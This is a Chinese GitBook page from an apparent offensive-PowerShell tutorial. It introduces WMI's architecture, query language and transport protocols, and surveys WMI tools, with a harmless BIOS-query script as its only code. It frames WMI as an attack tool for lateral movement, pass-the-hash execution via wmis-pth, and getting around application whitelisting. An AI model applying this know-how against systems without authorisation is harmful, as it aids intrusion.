
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>WMI&dot-net对象操作 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="8. Win32API.html" />
    
    
    <link rel="prev" href="ntlm-pian/README.md" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="./">
            
                <a href="./">
            
                    
                    前言
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="kerberos/README.md">
            
                <span>
            
                    
                    基础篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="2. 基础.html">
            
                <a href="2. 基础.html">
            
                    
                    基础知识
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.2" data-path="3. 脚本编写与执行.html">
            
                <a href="3. 脚本编写与执行.html">
            
                    
                    脚本编写与执行
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.3" data-path="4. Scoket网络编程.html">
            
                <a href="4. Scoket网络编程.html">
            
                    
                    Scoket网络编程
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
            
                <a href="5. 端口扫描与服务爆破.html">
            
                    
                    端口扫描与服务爆破
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.5" data-path="6. 多线程.html">
            
                <a href="6. 多线程.html">
            
                    
                    多线程
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="ntlm-pian/README.md">
            
                <span>
            
                    
                    进阶篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter active" data-level="1.3.1" data-path="7. WMI对象操作.html">
            
                <a href="7. WMI对象操作.html">
            
                    
                    WMI&dot-net对象操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="8. Win32API.html">
            
                <a href="8. Win32API.html">
            
                    
                    Win32API
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.3" data-path="9. Dll注入&shellcode注入&exe注入.html">
            
                <a href="9. Dll注入&shellcode注入&exe注入.html">
            
                    
                    注入操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="10. 混淆.html">
            
                <a href="10. 混淆.html">
            
                    
                    混淆
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.5" data-path="11. 日志操作.html">
            
                <a href="11. 日志操作.html">
            
                    
                    日志操作
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="ldap-pian/README.md">
            
                <span>
            
                    
                    应用篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.1" data-path="12. 实例使用场景.html">
            
                <a href="12. 实例使用场景.html">
            
                    
                    实例使用场景
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.2" data-path="13. Framework.html">
            
                <a href="13. Framework.html">
            
                    
                    Framework
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="." >WMI&dot-net对象操作</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell7-wmi">powershell(7)-WMI</h1>
<h2 id="&#x524D;&#x8A00;">&#x524D;&#x8A00;</h2>
<p>Wmi&#x65E0;&#x7591;&#x662F;&#x76EE;&#x524D;Windows&#x653B;&#x51FB;&#x4E2D;&#x7528;&#x7684;&#x6700;&#x591A;&#x7684;&#x5DE5;&#x5177;, &#x4ED6;&#x5F3A;&#x5927;&#x7684;&#x7BA1;&#x7406;&#x529F;&#x80FD;&#x4E3A;&#x6211;&#x4EEC;&#x5E26;&#x6765;&#x4E86;&#x6781;&#x5927;&#x7684;&#x4FBF;&#x5229;, &#x800C;Powershell&#x53EF;&#x4EE5;&#x8F7B;&#x677E;&#x7684;&#x64CD;&#x4F5C;&#x5E76;&#x5229;&#x7528;&#x5B83;, &#x6211;&#x4EEC;&#x4F1A;&#x7528;&#x8F83;&#x5927;&#x7684;&#x7BC7;&#x5E45;&#x6765;&#x8BE6;&#x7EC6;&#x4E86;&#x89E3;powershell&#x4E0E;wmi&#x7684;&#x9B45;&#x529B;&#x3002;&#x90A3;&#x4E48;WMI&#x6211;&#x4EEC;&#x7B80;&#x5355;&#x4ECB;&#x7ECD;&#x4E00;&#x4E9B;&#x5E38;&#x8BC6;&#x5373;&#x53EF;,&#x4E3B;&#x8981;&#x8FD8;&#x662F;&#x4ECB;&#x7ECD;Powershell&#x5229;&#x7528;&#x4E4B;&#x3002;</p>
<p>&#x672C;&#x8282;&#x5206;&#x4E0A;&#x4E0B;&#x8282;, &#x4E0A;&#x8282;&#x4E3B;&#x8981;&#x8BB2;&#x89E3;WMI&#x7684;&#x76F8;&#x5173;&#x77E5;&#x8BC6;,&#x4E0B;&#x8282;&#x4E3B;&#x8981;&#x8BB2;&#x89E3;powershell&#x5229;&#x7528;WMI&#x6765;&#x8FDB;&#x884C;&#x4E00;&#x4E9B;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x7B49;</p>
<h2 id="wmi&#x7B80;&#x4ECB;">WMI&#x7B80;&#x4ECB;</h2>
<p>WMI &#x7684;&#x5168;&#x79F0;&#x662F; Windows Management Instrumentation&#xFF0C;&#x5373; Windows &#x7BA1;&#x7406;&#x89C4;&#x8303;&#xFF0C;&#x5728; Windows &#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x4E2D;&#xFF0C;&#x968F;&#x7740; WMI &#x6280;&#x672F;&#x7684;&#x5F15;&#x5165;&#x5E76;&#x5728;&#x4E4B;&#x540E;&#x968F;&#x7740;&#x65F6;&#x95F4;&#x7684;&#x63A8;&#x79FB;&#x800C;&#x8FC7;&#x65F6;&#xFF0C;&#x5B83;&#x4F5C;&#x4E3A;&#x4E00;&#x9879;&#x529F;&#x80FD;&#x5F3A;&#x5927;&#x7684;&#x6280;&#x672F;&#xFF0C;&#x4ECE; Windows NT 4.0 &#x548C; Windows 95 &#x5F00;&#x59CB;&#xFF0C;&#x59CB;&#x7EC8;&#x4FDD;&#x6301;&#x5176;&#x4E00;&#x81F4;&#x6027;&#x3002;&#x5B83;&#x51FA;&#x73B0;&#x5728;&#x6240;&#x6709;&#x7684; Windows &#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x4E2D;&#xFF0C;&#x5E76;&#x7531;&#x4E00;&#x7EC4;&#x5F3A;&#x5927;&#x7684;&#x5DE5;&#x5177;&#x96C6;&#x5408;&#x7EC4;&#x6210;&#xFF0C;&#x7528;&#x4E8E;&#x7BA1;&#x7406;&#x672C;&#x5730;&#x6216;&#x8FDC;&#x7A0B;&#x7684; Windows &#x7CFB;&#x7EDF;&#x3002;</p>
<p>&#x5C3D;&#x7BA1;&#x5DF2;&#x88AB;&#x5927;&#x4F17;&#x6240;&#x77E5;&#x5E76;&#x4E14;&#x4ECE;&#x5176;&#x521B;&#x59CB;&#x4EE5;&#x6765;&#xFF0C;&#x5DF2;&#x7ECF;&#x88AB;&#x7CFB;&#x7EDF;&#x7BA1;&#x7406;&#x5458;&#x5927;&#x91CF;&#x4F7F;&#x7528;&#xFF0C;&#x4F46;&#x5F53;WMI&#x6280;&#x672F;&#x5728;&#x9707;&#x7F51;&#x75C5;&#x6BD2;&#x4E2D;&#x88AB;&#x53D1;&#x73B0;&#x4EE5;&#x540E;&#xFF0C;&#x5B83;&#x5F00;&#x59CB;&#x5728;&#x5B89;&#x5168;&#x793E;&#x533A;&#x53D8;&#x5F97;&#x975E;&#x5E38;&#x6D41;&#x884C;&#x3002;&#x4ECE;&#x90A3;&#x4E4B;&#x540E;&#xFF0C; WMI &#x5728;&#x653B;&#x51FB;&#x4E2D;&#x53D8;&#x5F97;&#x65E5;&#x76CA;&#x666E;&#x53CA;&#xFF0C;&#x5176;&#x4F5C;&#x7528;&#x6709;&#x6267;&#x884C;&#x7CFB;&#x7EDF;&#x4FA6;&#x5BDF;&#xFF0C;&#x53CD;&#x75C5;&#x6BD2;&#x548C;&#x865A;&#x62DF;&#x673A;&#x68C0;&#x6D4B;&#xFF0C;&#x4EE3;&#x7801;&#x6267;&#x884C;&#xFF0C;&#x6A2A;&#x5411;&#x8FD0;&#x52A8;&#xFF0C;&#x6743;&#x9650;&#x6301;&#x4E45;&#x5316;&#x4EE5;&#x53CA;&#x6570;&#x636E;&#x7A83;&#x53D6;&#x3002; &#x968F;&#x7740;&#x8D8A;&#x6765;&#x8D8A;&#x591A;&#x7684;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528; WMI &#x8FDB;&#x884C;&#x653B;&#x51FB;&#xFF0C;&#x4ED6;&#x5C06;&#x4F1A;&#x662F;&#x5B89;&#x5168;&#x7EF4;&#x62A4;&#x4EBA;&#x5458;&#xFF0C;&#x4E8B;&#x4EF6;&#x54CD;&#x5E94;&#x4EBA;&#x5458;&#xFF0C;&#x53D6;&#x8BC1;&#x5206;&#x6790;&#x5E08;&#x5FC5;&#x987B;&#x638C;&#x63E1;&#x7684;&#x4E00;&#x9879;&#x91CD;&#x8981;&#x6280;&#x80FD;&#xFF0C;&#x5E76;&#x4E14;&#x8981;&#x660E;&#x767D;&#x5982;&#x4F55;&#x53D1;&#x6325;&#x5B83;&#x7684;&#x4F18;&#x52BF;&#x3002;</p>
<h2 id="&#x57FA;&#x7840;&#x77E5;&#x8BC6;">&#x57FA;&#x7840;&#x77E5;&#x8BC6;</h2>
<p>&#x521A;&#x5F00;&#x59CB;&#x63A5;&#x89E6;WMI&#x7684;&#x670B;&#x53CB;&#x53EF;&#x80FD;&#x6709;&#x70B9;&#x6293;&#x72C2;,&#x6211;&#x4EEC;&#x4E0B;&#x9762;&#x5148;&#x6765;&#x770B;&#x770B;&#x6211;&#x4EEC;&#x9700;&#x8981;&#x77E5;&#x9053;&#x7684;&#x4E00;&#x4E9B;&#x540D;&#x8BCD;&#x7B49;&#xFF1A;</p>
<p>&#x5982;&#x679C;&#x4F60;&#x6709;&#x7814;&#x7A76;&#x4E0B;&#x53BB;&#x7684;&#x610F;&#x613F;, &#x8FD8;&#x662F;&#x63A8;&#x8350;&#x4F60;&#x9605;&#x8BFB;&#x5FAE;&#x8F6F;&#x7684;&#x6587;&#x6863;<a href="https://msdn.microsoft.com/zh-cn/library/aa393964(v=vs.85" target="_blank">msdn.microsoft.com</a>.aspx)</p>
<ol>
<li>WMI&#x662F;&#x5FAE;&#x8F6F;&#x5B9E;&#x73B0;&#x7684;&#x7531;&#x5206;&#x5E03;&#x5F0F;&#x7BA1;&#x7406;&#x4EFB;&#x52A1;&#x7EC4;&#xFF08;DMTF&#xFF09;&#x53D1;&#x5E03;&#x7684;&#x57FA;&#x4E8E; Web &#x7684;&#x4F01;&#x4E1A;&#x7BA1;&#x7406;&#xFF08;WBEM&#xFF09;&#x548C;&#x516C;&#x5171;&#x4FE1;&#x606F;&#x6A21;&#x578B;&#xFF08;CIM&#xFF09;&#x6807;&#x51C6;&#x3002;&#x4E5F;&#x5C31;&#x662F;&#x8BF4;DMTF&#x53D1;&#x5E03;&#x4E86;WBEM&#x548C;CIM</li>
<li>&#x4F7F;&#x7528; WMI: &#x5FAE;&#x8F6F;&#x63D0;&#x4F9B;&#x4E86;&#x591A;&#x79CD;&#x4F7F;&#x7528;WMI&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x76F4;&#x63A5;&#x4F7F;&#x7528;Powershell&#x6765;&#x7BA1;&#x7406;</li>
<li>&#x67E5;&#x8BE2; WMI: &#x67E5;&#x8BE2;&#x4E0A;WMI&#x6709;&#x4E13;&#x95E8;&#x7684;WMI &#x67E5;&#x8BE2;&#x8BED;&#x8A00;(WQL), &#x7C7B;&#x4F3C;SQL&#x8BED;&#x8A00;</li>
<li>WMI&#x662F;&#x5982;&#x4F55;&#x5F97;&#x5230;&#x6570;&#x636E;&#x7684;: &#x5F53;&#x7528;&#x6237;&#x8BF7;&#x6C42;WMI&#x5BF9;&#x8C61;&#x65F6;&#xFF0C;WMI &#x670D;&#x52A1; (Winmgmt) &#x9700;&#x8981;&#x77E5;&#x9053;&#x5982;&#x4F55;&#x8FD4;&#x56DE;&#x88AB;&#x8BF7;&#x6C42;&#x7684; WMI &#x5BF9;&#x8C61;&#x3002;&#x5F53; WMI &#x670D;&#x52A1;&#x586B;&#x5145; WMI &#x5BF9;&#x8C61;&#x65F6;&#xFF0C;&#x6709;&#x4E24;&#x79CD;&#x7C7B;&#x578B;&#x7684;&#x7C7B;&#x5B9E;&#x4F8B;: &#x52A8;&#x6001;&#x5BF9;&#x8C61;&#x548C;&#x6301;&#x4E45;&#x6027;&#x5BF9;&#x8C61;&#x3002;&#x52A8;&#x6001;&#x5BF9;&#x8C61;&#x662F;&#x5728;&#x7279;&#x5B9A;&#x67E5;&#x8BE2;&#x6267;&#x884C;&#x65F6;&#x5728;&#x8FD0;&#x884C;&#x8FC7;&#x7A0B;&#x4E2D;&#x751F;&#x6210;&#x7684;&#x3002;&#x4F8B;&#x5982;&#xFF0C;Win32_Process &#x5BF9;&#x8C61;&#x5C31;&#x662F;&#x5728;&#x8FD0;&#x884C;&#x8FC7;&#x7A0B;&#x4E2D;&#x52A8;&#x6001;&#x751F;&#x6210;&#x7684;&#x3002;&#x6301;&#x4E45;&#x6027;&#x5BF9;&#x8C61;&#x5B58;&#x50A8;&#x5728;&#x4F4D;&#x4E8E; <code>%SystemRoot%\System32\wbem\Repository\</code> &#x7684; CIM &#x6570;&#x636E;&#x5E93;&#x4E2D;&#xFF0C;&#x5B83;&#x5B58;&#x50A8;&#x7740; WMI &#x7C7B;&#x7684;&#x5B9E;&#x4F8B;&#xFF0C;&#x7C7B;&#x7684;&#x5B9A;&#x4E49;&#x548C;&#x547D;&#x540D;&#x7A7A;&#x95F4;&#x7684;&#x5B9A;&#x4E49;&#x3002;</li>
<li>&#x8FDC;&#x7A0B;&#x4F20;&#x8F93; WMI &#x6570;&#x636E;: Microsoft &#x63D0;&#x4F9B;&#x4E86;&#x4E24;&#x4E2A;&#x534F;&#x8BAE;&#x7528;&#x4E8E;&#x8FDC;&#x7A0B;&#x4F20;&#x8F93; WMI &#x6570;&#x636E;: &#x5206;&#x5E03;&#x5F0F;&#x7EC4;&#x4EF6;&#x5BF9;&#x8C61;&#x6A21;&#x578B; (DCOM) &#x548C; Windows &#x8FDC;&#x7A0B;&#x7BA1;&#x7406; (WinRM)&#x3002;&#x4E00;&#x822C;&#x6765;&#x8BF4;&#x6211;&#x4EEC;&#x662F;&#x901A;&#x8FC7;DCOM&#x6765;&#x8FDB;&#x884C;&#x901A;&#x4FE1;&#x7684;,&#x4E5F;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x7684;135&#x7AEF;&#x53E3;&#x7684;RPC&#x670D;&#x52A1;&#x3002;</li>
<li>WMI&#x7684;&#x547D;&#x540D;&#x7A7A;&#x95F4;: &#x5982;&#x679C;&#x4E0D;&#x5236;&#x5B9A;&#x547D;&#x540D;&#x7A7A;&#x95F4;&#x90A3;&#x4E48;ROOT\CIMV2&#x662F;WMI&#x7684;&#x9ED8;&#x8BA4;&#x547D;&#x540D;&#x7A7A;&#x95F4;, &#x53EF;&#x4EE5;&#x5728;&#x6CE8;&#x518C;&#x8868;<code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting</code>&#x8FDB;&#x884C;&#x4FEE;&#x6539;</li>
</ol>
<p>&#x4E0B;&#x9762;&#x4E00;&#x5F20;Fireeye&#x56FE;&#x4ECB;&#x7ECD;&#x4E86;WMI&#x7684;&#x7ED3;&#x6784;:</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps6/1.png" alt=""></p>
<h2 id="wmi&#x7BA1;&#x7406;&#x5DE5;&#x5177;">WMI&#x7BA1;&#x7406;&#x5DE5;&#x5177;</h2>
<p>&#x4E0B;&#x9762;&#x501F;&#x7528;Fireeye&#x5BF9;wmi&#x5DE5;&#x5177;&#x7684;&#x4ECB;&#x7ECD;:</p>
<h3 id="wmicexe">wmic.exe</h3>
<p>wmic.exe &#x662F;&#x4E00;&#x4E2A;&#x4E0E; WMI &#x8FDB;&#x884C;&#x4EA4;&#x4E92;&#x7684;&#x5F3A;&#x5927;&#x7684;&#x547D;&#x4EE4;&#x884C;&#x5B9E;&#x7528;&#x5DE5;&#x5177;&#x3002;&#x5B83;&#x62E5;&#x6709;&#x5927;&#x91CF;&#x7684; WMI &#x5BF9;&#x8C61;&#x7684;&#x65B9;&#x4FBF;&#x8BB0;&#x5FC6;&#x7684;&#x9ED8;&#x8BA4;&#x522B;&#x540D;&#xFF0C;&#x4F46;&#x4F60;&#x8FD8;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x66F4;&#x4E3A;&#x590D;&#x6742;&#x7684;&#x67E5;&#x8BE2;&#x3002;wmic.exe &#x8FD8;&#x53EF;&#x4EE5;&#x6267;&#x884C; WMI &#x65B9;&#x6CD5;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x7ECF;&#x5E38;&#x7528;&#x6765;&#x901A;&#x8FC7;&#x8C03;&#x7528; Win32_Process &#x7684; Create &#x65B9;&#x6CD5;&#x6765;&#x8FDB;&#x884C;&#x6A2A;&#x5411;&#x8FD0;&#x52A8;&#x3002;Wmic.exe &#x7684;&#x5C40;&#x9650;&#x6027;&#x4E4B;&#x4E00;&#x662F;&#x4E0D;&#x80FD;&#x63A5;&#x53D7;&#x8C03;&#x7528;&#x5D4C;&#x5165;&#x7684; WMI &#x5BF9;&#x8C61;&#x7684;&#x65B9;&#x6CD5;&#x3002;&#x5728; PowerShell &#x4E0D;&#x53EF;&#x7528;&#x7684;&#x60C5;&#x51B5;&#x4E0B;,&#x4F7F;&#x7528; wmic.exe &#x8DB3;&#x591F;&#x7528;&#x4E8E;&#x6267;&#x884C;&#x7CFB;&#x7EDF;&#x4FA6;&#x5BDF;&#x548C;&#x57FA;&#x672C;&#x65B9;&#x6CD5;&#x7684;&#x8C03;&#x7528;&#x3002;</p>
<h3 id="wbemtestexe">wbemtest.exe</h3>
<p>wbemtest.exe &#x662F;&#x4E00;&#x4E2A;&#x529F;&#x80FD;&#x5F3A;&#x5927;&#x7684;&#x5E26;&#x6709;&#x56FE;&#x5F62;&#x754C;&#x9762;&#x7684; WMI &#x8BCA;&#x65AD;&#x5DE5;&#x5177;&#x3002;&#x5B83;&#x80FD;&#x591F;&#x679A;&#x4E3E;&#x5BF9;&#x8C61;&#x5B9E;&#x4F8B;&#x3001;&#x6267;&#x884C;&#x67E5;&#x8BE2;&#x3001;&#x6CE8;&#x518C;&#x4E8B;&#x4EF6;&#x3001;&#x4FEE;&#x6539; WMI &#x5BF9;&#x8C61;&#x548C;&#x7C7B;&#xFF0C;&#x5E76;&#x4E14;&#x53EF;&#x4EE5;&#x5728;&#x672C;&#x5730;&#x6216;&#x8FDC;&#x7A0B;&#x53BB;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#x3002;&#x5B83;&#x7684;&#x63A5;&#x53E3;&#x5BF9;&#x5927;&#x591A;&#x6570;&#x7528;&#x6237;&#x6765;&#x8BF4;&#x4E0D;&#x662F;&#x7279;&#x522B;&#x53CB;&#x597D;&#xFF0C;&#x4F46;&#x4ECE;&#x653B;&#x51FB;&#x8005;&#x7684;&#x89D2;&#x5EA6;&#x6765;&#x770B;&#xFF0C;&#x5728;&#x5176;&#x4ED6;&#x5DE5;&#x5177;&#x4E0D;&#x53EF;&#x7528;&#x65F6;&#xFF0C;&#x5B83;&#x5B8C;&#x5168;&#x53EF;&#x4EE5;&#x4F5C;&#x4E3A;&#x66FF;&#x4EE3;&#x9009;&#x9879; &#x2014;&#x2014; &#x4F8B;&#x5982;&#xFF0C;&#x5982;&#x679C;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x767D;&#x540D;&#x5355;&#x673A;&#x5236;&#x963B;&#x6B62;&#x4E86; wmic.exe &#x548C; powershell.exe&#xFF0C;&#x90A3;&#x4E48; wbemtest.exe &#x5C06;&#x662F;&#x4E00;&#x4E2A;&#x5E26;&#x6709;&#x4E00;&#x4E2A;&#x4E0D;&#x592A;&#x7406;&#x60F3;&#x7684; UI &#xFF08;&#x5982;&#x56FE; 3 &#x6240;&#x793A;&#xFF09;&#x4F46;&#x662F;&#x529F;&#x80FD;&#x5374;&#x5F88;&#x5F3A;&#x5927;&#x7684;&#x5B9E;&#x7528;&#x5DE5;&#x5177;&#x3002;</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps6/3.png" alt=""></p>
<h3 id="winrmexe">winrm.exe</h3>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps6/2.png" alt=""></p>
<h3 id="vbscript-and-jscript">VBScript and JScript</h3>
<p>&#x8FD9;&#x4E24;&#x4E2A;&#x811A;&#x672C;&#x8BED;&#x8A00;&#x76F8;&#x4FE1;&#x4E0D;&#x7528;&#x6211;&#x4ECB;&#x7ECD;&#x4E86;&#xFF0C;&#x540C;&#x6837;&#x4E5F;&#x53EF;&#x4EE5;&#x64CD;&#x4F5C;WMI</p>
<h3 id="wmic-wmis-wmis-pthlinux">wmic, wmis, wmis-pth(Linux)</h3>
<p>wmic &#x662F;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684; Linux &#x547D;&#x4EE4;&#x884C;&#x5B9E;&#x7528;&#x5DE5;&#x5177;&#xFF0C;&#x7528;&#x4E8E;&#x6267;&#x884C; WMI &#x67E5;&#x8BE2;&#x3002;wmis &#x662F; Win32_Process &#x7C7B;&#x7684; Create &#x65B9;&#x6CD5;&#x7684;&#x8FDC;&#x7A0B;&#x8C03;&#x7528;&#x547D;&#x4EE4;&#x884C;&#x5305;&#x88C5;&#x7A0B;&#x5E8F;&#xFF0C;&#x5E76;&#x4E14;&#x652F;&#x6301;&#x4F7F;&#x7528; NTLM &#x54C8;&#x5E0C;&#x8FDB;&#x884C;&#x8FDE;&#x63A5;&#x8FDC;&#x7A0B;&#x8BA1;&#x7B97;&#x673A;&#xFF0C;&#x56E0;&#x6B64;&#xFF0C; wmis &#x5DF2;&#x7ECF;&#x88AB;&#x6E17;&#x900F;&#x6D4B;&#x8BD5;&#x4EBA;&#x5458;&#x5927;&#x91CF;&#x4F7F;&#x7528;&#x3002;</p>
<h3 id="powershell">Powershell</h3>
<p>&#x8FD9;&#x91CC;&#x6709;&#x4E00;&#x4E2A;&#x540D;&#x8BCD;&#x662F;CIM&#xFF08;Common Information Model&#xFF09;&#xFF0C;&#x7B80;&#x5355;&#x6765;&#x8BF4;WMI&#x5C31;&#x662F;&#x5FAE;&#x8F6F;&#x9488;&#x5BF9;windows&#x7684;CIM&#x5B9E;&#x73B0;&#xFF0C;WMI&#x7531;&#x4E8E;&#x8FC7;&#x5EA6;&#x4F9D;&#x8D56;135&#x3001;445&#x7AEF;&#x53E3;&#x901A;&#x4FE1;&#x5DF2;&#x7ECF;&#x9010;&#x6E10;&#x7684;&#x88AB;&#x9057;&#x5F03;&#xFF0C;&#x73B0;&#x5728;&#x5FAE;&#x8F6F;&#x9488;&#x5BF9; WMI&#x5BF9;&#x8C61;&#x7684;&#x83B7;&#x53D6;&#x65B9;&#x5F0F;&#x5DF2;&#x7ECF;&#x53D8;&#x4E3A;CIM&#xFF0C;&#x672A;&#x6765;WinRM&#x624D;&#x662F;&#x5FAE;&#x8F6F;&#x4E3B;&#x63A8;&#x7684;&#x5185;&#x5BB9;&#x3002;
Powershell2.0&#x53EA;&#x62E5;&#x6709;Get-WmiObject&#x6765;&#x83B7;&#x53D6;WMI&#x5BF9;&#x8C61;&#xFF0C;&#x4F46;PowerShell 3.0&#x5F00;&#x59CB;&#x589E;&#x52A0;&#x4E86;Get-WmiObject &#x7684;&#x53E6;&#x4E00;&#x4E2A;&#x9009;&#x62E9;&#xFF1A;Get-CimInstance&#x3002;&#x867D;&#x7136; Get-WmiObject &#x4ECD;&#x7136;&#x5B58;&#x5728;&#xFF0C;&#x4F46; Get-CimInstance &#x7EDD;&#x5BF9;&#x662F;&#x672A;&#x6765;&#x7684;&#x9009;&#x62E9;&#x3002;&#x8FD9;&#x4E2A; Cmdlet &#x652F;&#x6301; WMI &#x7C7B;&#x7684;&#x667A;&#x80FD;&#x63D0;&#x793A;&#xFF08;&#x5728; PowerShell ISE &#x4E2D;&#xFF09;&#xFF0C;&#x5E76;&#x4E14;&#x8FD4;&#x56DE;&#x7684;&#x6570;&#x636E;&#x53EF;&#x8BFB;&#x6027;&#x66F4;&#x597D;&#xFF1A;&#x4F8B;&#x5982;&#x65E5;&#x671F;&#x662F;&#x4EE5;&#x4EBA;&#x7C7B;&#x53EF;&#x8BFB;&#x7684;&#x65E5;&#x671F;&#x683C;&#x5F0F;&#x8FD4;&#x56DE;&#xFF0C;&#x800C;Get-WmiObject&#x663E;&#x793A; WMI &#x5185;&#x90E8;&#x539F;&#x59CB;&#x7684;&#x65E5;&#x671F;&#x683C;&#x5F0F;&#x3002;</p>
<p>&#x6700;&#x91CD;&#x8981;&#x7684;&#x533A;&#x522B;&#x662F;&#x5B83;&#x4EEC;&#x8FDC;&#x7A0B;&#x5DE5;&#x4F5C;&#x7684;&#x65B9;&#x6CD5;&#x3002;Get-WmiObject &#x4F7F;&#x7528;&#x7684;&#x662F;&#x65E7;&#x7684; DCOM &#x534F;&#x8BAE;&#xFF0C;&#x800C; Get-CimInstance &#x7F3A;&#x7701;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x65B0;&#x7684; WSMan &#x534F;&#x8BAE;&#xFF0C;&#x4E0D;&#x8FC7;&#x5B83;&#x662F;&#x7075;&#x6D3B;&#x7684;&#xFF0C;&#x53EF;&#x4EE5;&#x6839;&#x636E;&#x9700;&#x8981;&#x9000;&#x56DE; DCOM &#x534F;&#x8BAE;&#x3002;</p>
<p>&#x4EE5;&#x4E0B;&#x793A;&#x4F8B;&#x51FD;&#x6570;&#x901A;&#x8FC7; Get-CimInstance &#x8FDC;&#x7A0B;&#x83B7;&#x53D6; BIOS &#x4FE1;&#x606F;&#x3002;&#x8BE5;&#x51FD;&#x6570;&#x7F3A;&#x7701;&#x91C7;&#x7528; DCOM&#xFF0C;&#x901A;&#x8FC7; -Protocol &#x53C2;&#x6570;&#x60A8;&#x53EF;&#x4EE5;&#x9009;&#x62E9;&#x5E0C;&#x671B;&#x7684;&#x901A;&#x4FE1;&#x534F;&#x8BAE;&#xFF1A;</p>
<pre><code class="lang-powershell"><span class="hljs-comment">#requires -Version 3</span>
<span class="hljs-keyword">function</span> Get-BIOS
{
    <span class="hljs-keyword">param</span>
    (
        <span class="hljs-variable">$ComputerName</span> = <span class="hljs-variable">$env:COMPUTERNAME</span>,

        [Microsoft.Management.Infrastructure.CimCmdlets.ProtocolType]
        <span class="hljs-variable">$Protocol</span> = <span class="hljs-string">&apos;DCOM&apos;</span>
    )
    <span class="hljs-variable">$option</span> = New-CimSessionOption -Protocol <span class="hljs-variable">$protocol</span>
    <span class="hljs-variable">$session</span> = New-CimSession -ComputerName <span class="hljs-variable">$ComputerName</span> -SessionOption <span class="hljs-variable">$option</span>
    Get-CimInstance -CimSession <span class="hljs-variable">$session</span> -ClassName Win32_BIOS
}
</code></pre>
<p>&#x53C2;&#x8003;&#x94FE;&#x63A5;&#xFF1A;
<a href="https://blog.vichamp.com/2016/01/07/use-get-ciminstance-with-dcom/" target="_blank">https://blog.vichamp.com/2016/01/07/use-get-ciminstance-with-dcom/</a>
<a href="https://blog.ipswitch.com/get-ciminstance-vs-get-wmiobject-whats-the-difference" target="_blank">https://blog.ipswitch.com/get-ciminstance-vs-get-wmiobject-whats-the-difference</a></p>
<h2 id="powershell---wmi">Powershell---WMI</h2>
<p>&#x9996;&#x5148;&#x6765;&#x770B;&#x770B;&#x547D;&#x4EE4;&#x5427;:</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps6/4.png" alt=""></p>
